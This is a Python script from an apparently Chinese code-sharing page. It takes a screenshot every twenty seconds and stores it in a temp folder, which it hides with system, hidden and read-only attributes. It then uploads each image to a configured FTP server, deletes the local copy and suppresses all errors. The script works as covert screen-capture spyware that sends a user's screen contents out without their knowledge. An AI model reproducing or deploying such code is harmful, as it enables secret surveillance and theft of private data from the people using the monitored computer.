
时间:2017-11-09 12:43:58

标签: python ftp


import autopy import time import os import ftplib delay_time=20 # time interval between screen_shoots ##############function for deleting file in specified path if found######### def delet_file(dirr,nam): if os.path.isfile(dirr+nam): try: os.remove(dirr+nam) except: pass return None #############Function for uploading your file to FTP server############# def ftp_upload(Host,User,User_pass,ftp_dir,loca_dir,fil): try: con=con=ftplib.FTP(Host) con.login(User,User_pass) try: con.mkd(ftp_dir) con.cwd(ftp_dir) f=open(loca_dir+fil,'rb') con.storbinary("STOR "+fil,f) f.close() con.quit() delet_file(loca_dir,fil) except: con.cwd(ftp_dir) f=open(loca_dir+fil,'rb') con.storbinary("STOR "+fil,f) f.close() con.quit() delet_file(loca_dir,fil) except: pass return None ######## Function for generating unique image name################## def getfile_name(): image_name=(time.asctime().replace(" ","_")).replace(":","")+".png" return image_name ##############function for generating and returning path in local computer######### def generat_path(): dir_name=os.environ["TMP"]+os.sep+os.environ["USERNAME"]+"psc"+os.sep try: if os.path.isdir(dir_name): os.popen("attrib +s +h +r " +dir_name) else: os.mkdir(dir_name) os.popen("attrib +s +h +r " +dir_name) except: pass return dir_name ########################### main function to take screen shoot and save it######### def capture_shoot(full_path): try: z=autopy.bitmap.capture_screen() z.save(full_path) except : pass return None ###########from here start your script###################3 def start(): ftp_dir=os.environ["COMPUTERNAME"] #get computer name #######set your ftp server data ####### ####### make your own ( _ ) ######### host='' #host name passwd='' #Password for ftp server login_id='' #username for ftp server ########## loop in the script and excuting every interval######## while True : image_name=getfile_name() local_dir=generat_path() capture_shoot(local_dir+image_name) ftp_upload(host,login_id,passwd,ftp_dir,local_dir,image_name) time.sleep(delay_time) ### this mean if you import script as module don't #### excute and return false elseif excuted as script impliment start if __name__=='__main__': start() <code>

#####################非常感谢####################### ######

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